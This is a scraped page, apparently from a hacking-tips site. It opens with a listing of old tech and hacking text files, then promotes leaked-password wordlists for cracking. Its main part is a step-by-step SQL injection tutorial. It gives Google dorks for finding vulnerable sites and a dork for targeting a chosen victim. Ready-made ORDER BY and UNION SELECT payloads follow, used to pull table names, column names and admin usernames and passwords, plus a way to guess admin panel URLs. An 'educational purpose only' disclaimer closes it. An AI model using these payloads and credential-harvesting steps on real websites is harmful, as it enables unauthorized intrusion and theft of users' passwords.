497. Testing Wattage Consumption Of Your Computer, Measuring your computer’s wattage.txt 9.33 kB
498. The Antivirus Defense-in-Depth Guide.txt 2.77 kB
499. The difference between DVD-R, DVD+R, DVD+RW and DVD-RW.txt 3.69 kB
500. The Modern Phreakers Guide To Beige Boxing.txt 4.32 kB
501. The Modern Phreakers Guide To Payphones.txt 6.98 kB
502. The Port Guide, Port number and info.txt 24.64 kB
503. The Ultimate Guide To Installing Windows Xp Sp2.txt 3.14 kB
504. Three Ways Of Bypass Starforce Cd Protection.txt 2.48 kB
505. Tip for shutdown windows – virus.txt 0.39 kB
506. Tips And Tricks, Windows XP.txt 41.24 kB
507. Tired Of Reinstalling Windows.txt 2.31 kB
508. To Get And Show The Ip Via Javascript.txt 0.62 kB
509. Top 5 Myths About Safe Surfing, PC Magazine.txt 3.36 kB
510. Transferring Data.txt 6.45 kB
511. Translating Binary To Text.txt 6.22 kB
512. Translating Binary to Text2.txt 5.72 kB
513. Trojan Ports.txt 13.83 kB
514. Turn MSN Messenger Display Pix into User Pix on XP.txt 2.50 kB
515. Turn Off Unneeded Services, speed up pc.txt 1.56 kB
516. Tutorial Get the serial number you need.txt 0.88 kB
517. Tutorial How to create a bootable Windows XP SP1 CD (Nero).txt 2.17 kB
518. Tutorials – blacksun.box.sk/coding/Base Number Systems.html 7.78 kB
519. Tutorials – blacksun.box.sk/coding/BASIC C Socket Programming In Unix For Newbies.txt 21.50 kB
520. Tutorials – blacksun.box.sk/coding/Basics of am 3mp33j3w.txt 18.64 kB
521. Tutorials – blacksun.box.sk/coding/Batch File Programming.txt 41.70 kB
522. Tutorials – blacksun.box.sk/coding/BOOLEAN LOGIC GATES.html 14.04 kB
523. Tutorials – blacksun.box.sk/coding/C++ Tutorial By Clayman.html 23.77 kB
524. Tutorials – blacksun.box.sk/coding/Creating A Simple Hit Counter In PHP.html 8.77 kB
525. Tutorials – blacksun.box.sk/coding/Creating A Simple Search Engine In PHP.html 9.62 kB
526. Where Is Winipcfg In Winxp.txt 0.62 kB
527. Who’s Seeding The Net With Spyware.txt 5.33 kB
528. Why wait 35 Seconds at eZshare.txt 1.55 kB
529. Win 2000 Dr. Watsson.txt 0.23 kB
530. Windows 2000 Tips & Tricks.txt 4.58 kB
531. Windows 2003 System Restore, How to activate system restore in W2K3.txt 5.47 kB
532. Windows Scan Count Down Time.txt 0.54 kB
533. Windows Shortcuts.txt 12.84 kB
534. WINDOWS TRUE HIDDEN FILES.txt 9.46 kB
535. Windows Tweak, Hack Your Start Button.txt 3.25 kB
536. Windows Xp – Speed Up Your Network and Internet Access.txt 2.70 kB
537. WINDOWS XP HIDDEN APPS.txt 2.59 kB
538. Windows XP Registry Tweaks.txt 34.05 kB
539. Windows XP Startup and Performance Tweaks.txt 1.76 kB
540. Windows Xp Tips ‘n’ Tricks.txt 28.51 kB
541. Windows Xp Tweaks, A work in progress.txt 2.98 kB
542. Windows XP Tweaks.txt 2.37 kB
543. WinRar Tutorial – Compression profiles, passwords and more.txt 5.78 kB
544. Winsock 2 Repair.txt 2.10 kB
545. WinXP 3 Tips.txt 1.87 kB
546. Winxp Application Defrag, faster access for used programs.txt 0.30 kB
547. Winxp Applications Startup Time, Decrease your Applications startup time.txt 1.16 kB
548. WinXP Bootable CD.txt 2.19 kB
549. Winxp System Response, reboot whitout rebooting.txt 0.61 kB
550. Winxp Tips And Tricks, Winsock 2 repair.txt 2.19 kB
551. Xp Auto Install.txt 1.79 kB
552. Xp Folder View Does Not Stay To You’re Setting., Grab your registry editor and join in.txt 1.87 kB
553. XP REPAIR INSTALL.txt 5.92 kB
554. XP Tweaking.txt 15.75 kB
555. Yahoo + geocities Posts.txt 3.07 kB
556. Yahoo Messeger, no ad’s.txt 0.83 kB
557. You Want Lots Of Music, Appz, Anything, Try Dex Hunting.txt 1.47 kB
558. Your Home Page Nevr Being Changed.txt 0.50 kB
559. Your Own Home Server – Introduction.txt 11.25


February 14, 2012

Large Password List: Free Download Dictionary File for Password Cracking

For password cracking, you can choose two different methods 1. Dictionary Attack 2. Brute Force Attack. The Dictionary attack is much faster when compared to Brute force attack.(There is another method named as "Rainbow table", it is similar to Dictionary attack).

In order to achieve success in dictionary attack, we need a large size of Password list. 

Here is the list of 1,717,681passwords(Free to download):
http://dazzlepod.com/site_media/txt/passwords.txt

If you didn't get success using the above password list, then you can get the UNIQPass dictionary file from dazzlepod.

UNIQPASS is large password list useful for use with John the Ripper (JtR) wordlist mode to translate even more hashes into cleartext passwords. While we have had good success rate with our standard password list passwords.txt (17.5MB), we realized the list can be made more useful and relevant if we include commonly used passwords from the recently leaked databases belonging to large websites. As a result, we have compiled millions of unique passwords into UNIQPASS.

UNIQPASS is available for purchase at only $4.99; see preview of UNIQPASS from these 2 million randomly selected passwords (18.9MB).

Get the UNIQPass Dictionary file from here:
http://dazzlepod.com/uniqpass/

Hacking website using SQL Injection -step by step guide

Before we see what  SQL Injection is. We should know what SQL and Database are.
Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more. 
Some List of Database are:
* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:
Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:
http://www.victimsite.com/index.php?id=2'
 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number andorder by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--


It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--


It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--



Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html


Note:
This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing.